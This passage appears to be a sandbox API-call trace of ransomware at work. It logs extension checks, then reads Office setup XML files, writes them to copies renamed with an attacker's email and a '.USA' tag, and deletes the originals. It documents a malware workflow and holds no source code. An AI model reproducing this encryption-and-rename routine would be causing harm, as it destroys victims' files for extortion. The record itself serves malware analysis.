returned -1 [0040.044] lstrlenW (lpString=".docx") returned 5 [0040.044] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1 [0040.044] lstrlenW (lpString=".pdf") returned 4 [0040.044] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.044] lstrlenW (lpString=".xls") returned 4 [0040.044] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.044] lstrlenW (lpString=".xlsx") returned 5 [0040.044] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1 [0040.044] lstrlenW (lpString=".ppt") returned 4 [0040.044] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.044] lstrlenW (lpString=".zip") returned 4 [0040.044] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.044] lstrlenW (lpString=".rar") returned 4 [0040.044] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.044] lstrlenW (lpString=".bz2") returned 4 [0040.044] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.044] lstrlenW (lpString=".7z") returned 3 [0040.044] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.044] lstrlenW (lpString=".dbf") returned 4 [0040.044] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.044] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.045] lstrlenW (lpString=".1cd") returned 4 [0040.045] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105 [0040.045] lstrlenW (lpString=".jpg") returned 4 [0040.045] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.045] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.045] lstrlenW (lpString="Office32MUI.XML") returned 15 [0040.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.312] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1383) returned 1 [0040.312] CloseHandle (hObject=0x19c) returned 1 [0040.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 0x20 [0040.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.312] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.312] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0040.576] GetLastError () returned 0x0 [0040.576] ReadFile (in: hFile=0x19c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x567, lpOverlapped=0x0) returned 1 [0040.587] WriteFile (in: hFile=0x174, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x570, lpOverlapped=0x0) returned 1 [0040.588] ReadFile (in: hFile=0x19c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.588] WriteFile (in: hFile=0x174, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xf2, lpOverlapped=0x0) returned 1 [0040.588] SetEndOfFile (hFile=0x174) returned 1 [0040.588] CloseHandle (hObject=0x174) returned 1 [0040.589] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.589] SetEndOfFile (hFile=0x19c) returned 1 [0040.590] CloseHandle (hObject=0x19c) returned 1 [0040.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.590] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 1 [0040.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.590] lstrlenW (lpString=".doc") returned 4 [0040.590] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.590] lstrlenW (lpString=".docx") returned 5 [0040.590] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.590] lstrlenW (lpString=".pdf") returned 4 [0040.590] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.590] lstrlenW (lpString=".xls") returned 4 [0040.590] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.590] lstrlenW (lpString=".xlsx") returned 5 [0040.590] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.591] lstrlenW (lpString=".ppt") returned 4 [0040.591] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.591] lstrlenW (lpString=".zip") returned 4 [0040.591] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.591] lstrlenW (lpString=".rar") returned 4 [0040.591] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString=".bz2") returned 4 [0040.591] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString=".7z") returned 3 [0040.591] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.591] lstrlenW (lpString=".dbf") returned 4 [0040.591] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.591] lstrlenW (lpString=".1cd") returned 4 [0040.591] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.591] lstrlenW (lpString=".jpg") returned 4 [0040.591] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.591] lstrlenW (lpString=".doc") returned 4 [0040.591] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString=".docx") returned 5 [0040.591] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.591] lstrlenW (lpString=".pdf") returned 4 [0040.591] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString=".xls") returned 4 [0040.591] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString=".xlsx") returned 5 [0040.591] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.591] lstrlenW (lpString=".ppt") returned 4 [0040.591] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.592] lstrlenW (lpString=".zip") returned 4 [0040.592] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.592] lstrlenW (lpString=".rar") returned 4 [0040.592] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.592] lstrlenW (lpString=".bz2") returned 4 [0040.592] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.592] lstrlenW (lpString=".7z") returned 3 [0040.592] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.592] lstrlenW (lpString=".dbf") returned 4 [0040.592] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.592] lstrlenW (lpString=".1cd") returned 4 [0040.592] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.592] lstrlenW (lpString=".jpg") returned 4 [0040.592] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.592] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.592] lstrlenW (lpString="SETUP.XML") returned 9 [0040.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.332] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1886) returned 1 [0041.332] CloseHandle (hObject=0x170) returned 1 [0041.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 0x20 [0041.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.361] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.362] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0041.362] GetLastError () returned 0x0 [0041.362] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x75e, lpOverlapped=0x0) returned 1 [0041.402] WriteFile (in: hFile=0x1c8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x760, lpOverlapped=0x0) returned 1 [0041.403] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.403] WriteFile (in: hFile=0x1c8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.404] SetEndOfFile (hFile=0x1c8) returned 1 [0041.404] CloseHandle (hObject=0x1c8) returned 1 [0041.404] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.404] SetEndOfFile (hFile=0x1b8) returned 1 [0041.405] CloseHandle (hObject=0x1b8) returned 1 [0041.405] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.405] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 1 [0041.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.406] lstrlenW (lpString=".doc") returned 4 [0041.406] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString=".docx") returned 5 [0041.406] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.406] lstrlenW (lpString=".pdf") returned 4 [0041.406] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString=".xls") returned 4 [0041.406] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString=".xlsx") returned 5 [0041.406] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.406] lstrlenW (lpString=".ppt") returned 4 [0041.406] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.406] lstrlenW (lpString=".zip") returned 4 [0041.406] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.406] lstrlenW (lpString=".rar") returned 4 [0041.406] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString=".bz2") returned 4 [0041.406] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString=".7z") returned 3 [0041.406] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.406] lstrlenW (lpString=".dbf") returned 4 [0041.406] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.406] lstrlenW (lpString=".1cd") returned 4 [0041.406] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.406] lstrlenW (lpString=".jpg") returned 4 [0041.406] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.406] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.406] lstrlenW (lpString=".doc") returned 4 [0041.407] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString=".docx") returned 5 [0041.407] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.407] lstrlenW (lpString=".pdf") returned 4 [0041.407] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString=".xls") returned 4 [0041.407] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString=".xlsx") returned 5 [0041.407] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.407] lstrlenW (lpString=".ppt") returned 4 [0041.407] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.407] lstrlenW (lpString=".zip") returned 4 [0041.407] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.407] lstrlenW (lpString=".rar") returned 4 [0041.407] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString=".bz2") returned 4 [0041.407] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString=".7z") returned 3 [0041.407] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.407] lstrlenW (lpString=".dbf") returned 4 [0041.407] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.407] lstrlenW (lpString=".1cd") returned 4 [0041.407] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0041.407] lstrlenW (lpString=".jpg") returned 4 [0041.407] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.407] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.407] lstrlenW (lpString="SETUP.XML") returned 9 [0041.408] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.409] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=20577) returned 1 [0041.409] CloseHandle (hObject=0x1b8) returned 1 [0041.409] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 0x20 [0041.409] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.409] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.409] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.410] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.410] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0041.410] GetLastError () returned 0x0 [0041.410] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x5061, lpOverlapped=0x0) returned 1 [0041.415] WriteFile (in: hFile=0x1c8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x5070, lpOverlapped=0x0) returned 1 [0041.416] ReadFile (in: hFile=0x1b8, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.416] WriteFile (in: hFile=0x1c8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.416] SetEndOfFile (hFile=0x1c8) returned 1 [0041.416] CloseHandle (hObject=0x1c8) returned 1 [0041.417] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.417] SetEndOfFile (hFile=0x1b8) returned 1 [0041.418] CloseHandle (hObject=0x1b8) returned 1 [0041.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.418] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 1 [0041.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.418] lstrlenW (lpString=".doc") returned 4 [0041.418] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString=".docx") returned 5 [0041.418] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.419] lstrlenW (lpString=".pdf") returned 4 [0041.419] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString=".xls") returned 4 [0041.419] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString=".xlsx") returned 5 [0041.419] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.419] lstrlenW (lpString=".ppt") returned 4 [0041.419] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96 [0041.419] lstrlenW (lpString=".zip") returned 4 [0041.419] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.419] lstrlenW (lpString=".rar") returned 4 [0041.419] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString=".bz2") returned 4 [0041.419] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 